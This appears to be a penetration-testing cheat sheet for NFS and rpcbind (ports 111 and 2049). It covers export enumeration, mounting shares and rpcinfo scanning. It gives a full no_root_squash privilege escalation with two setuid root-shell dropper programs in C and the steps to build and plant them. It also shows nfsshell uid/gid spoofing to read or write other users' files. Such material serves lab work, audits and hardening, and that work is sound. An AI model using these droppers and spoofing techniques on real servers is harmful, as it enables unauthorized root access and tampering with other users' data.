Port 111 (rpcbind / portmapper) and 2049 (NFS)

Network File System (NFS) — exports are typically authenticated with AUTH_SYS, i.e. the client simply asserts its uid/gid, so access control largely depends on the export options (squashing) rather than on real authentication.

Show Mountable NFS Shares

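# Ask the server's mountd for the export list (goes through rpcbind on 111, so 111 must be reachable)
showmount -e <IP>
# Same enumeration via nmap; pinning the ports keeps the scan fast, -oN saves the result to a file
nmap -p 111,2049 --script nfs-showmount -oN mountable_shares <IP>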

Mount a share

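# The mount point has to exist before mounting
sudo mkdir -p <DIRECTORY>
# Let the client negotiate the version (v3/v4 on current servers)
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
# Force NFSv2 when the server still offers it (older exports sometimes only answer old versions)
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
# Safer default for browsing an unknown share: read-only, and setuid bits / execution ignored on our side,
# so a binary planted on the share cannot be turned against the attacking host
sudo mount -v -t nfs -o ro,nosuid,noexec <IP>:<SHARE> <DIRECTORY>
# Clean up when done
sudo umount <DIRECTORY>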

NFS misconfigurations

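# On the NFS server: the export configuration, including drop-in files (stderr silenced in case exports.d is absent)
cat /etc/exports /etc/exports.d/*.exports 2>/dev/null
# Effective export table with every option resolved — shows root_squash / no_root_squash explicitly,
# which is what matters for the privesc below
exportfs -v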

If a share is exported with no_root_squash (the client's uid 0 is not mapped to the anonymous user on the server) or no_all_squash, and you can write to it, you can plant a root-owned setuid binary on the share and execute it from a low-privileged shell on the server to escalate privileges.

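# Attacker, as root user: you must really be uid 0 locally, because the file's owner on the server
# is whatever uid the client presents — with no_root_squash that stays 0.
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
# The includes avoid implicit-declaration errors (hard errors on recent gcc).
# setreuid(0,0) sets both real and effective uid, so bash does not drop privileges (it does when euid != ruid).
cat > pwn.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setreuid(0, 0); system("/bin/bash"); return 0; }
EOF
# The binary runs on the server, so build for its architecture; -static sidesteps libc version
# mismatches between attacker and victim (if static glibc is unavailable, build on a matching box).
gcc -static pwn.c -o pwn
# Explicit mode: setuid+setgid (what chmod +s would set), executable by anyone
chmod 6755 pwn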

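# Victim: a low-privileged shell on the NFS server. <SHARE> is the exported path as written in /etc/exports.
# Check before running: expect "-rwsr-sr-x 1 root root". If the owner is nobody/nfsnobody, root was squashed
# and the setuid bit is useless. Note the bit is also ignored if that filesystem is mounted nosuid.
ls -l <SHARE>/pwn
cd <SHARE>
./pwn # Root shell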

Scan

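# Export list from mountd
showmount -e someexample.com

# rpcinfo takes a host, not a port number: -p lists every RPC program registered with the
# portmapper (nfs, mountd, nlockmgr, ...) and the ports they listen on
rpcinfo -p someexample.com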

Installation (client tools on Debian/Kali)

apt-get install rpcbind

apt-get install nfs-common
rpcinfo -p IP_Address

rpcdump (from Impacket)

rpcdump.py 10.10.xx.xx

nmap

nmap -Pn -sV -script=nfs*

Mount the NFS share

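# nolock: skip the NLM lock manager, handy when the server only exposes nfs/mountd
mount -o nolock <ip>:/path_remote /path/local

# Browse an unknown share read-only with setuid and exec disabled on our side, so a binary planted
# on the share (by the admin or another attacker) cannot be used against the attacking host
mkdir backup
mount -o ro,nosuid,noexec someexample.com:/backup backup
ls backup
# -> backup.tar.bz2.zip
# Unmount before remounting with other options: a second mount on the same directory
# stacks on top of the first instead of replacing it
umount backup
mount -t nfs someexample.com:/backup backup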

Vulnerability (no_root_squash / no_all_squash)

Check "/etc/exports": if a share has no_root_squash or no_all_squash and we have write access to it, we can plant a setuid executable, e.g.:

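#include <stdlib.h>
#include <unistd.h>

/* Setuid shell dropper: once the binary is root-owned with u+s, running it as any user
 * yields a root shell on the server. */
int main(void) {
    /* Raise gid first, then uid. Running with euid 0 (setuid bit) both calls succeed; setuid(0)
     * sets real, effective and saved uid, so shells that drop privileges when euid != ruid stay root. */
    setgid(0);
    setuid(0);
    /* The list terminator must be a (char *)NULL: a bare 0 is an int and is not guaranteed
     * to be pointer-sized in a variadic call. */
    execl("/bin/sh", "sh", (char *)NULL);
    return 1; /* only reached if exec failed */
}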
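# Run as root on the attacker's mount of the share (no_root_squash lets uid 0 pass through).
# Colon separator: the legacy "root.root" form is deprecated in coreutils.
chown root:root ./pwnme
chmod u+s ./pwnme
# Verify owner and mode before using it from the victim side
ls -l ./pwnme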

nfsshell

  • Install from https://github.com/NetDirect/nfsshell (clone the repository, then build inside it):

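    # Build dependencies: readline and ncurses headers (newer Debian/Kali name the ncurses package libncurses-dev)
    sudo apt-get install -y libreadline-dev libncurses5-dev
    make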
  • Use (nfsshell talks NFS directly in userspace, so it does not need a kernel mount or local root):

    nfsshell
    nfs> host 10.10.10.34
    nfs> export
    nfs> mount /<SHARE>
    nfs> uid <UID>
    nfs> gid <GID>

    `uid`/`gid` set the credentials nfsshell presents to the server. Under AUTH_SYS these are client-asserted, so when root is squashed you can still claim the uid of whichever user owns files on the share (see `ls -l` output) and read or write them.
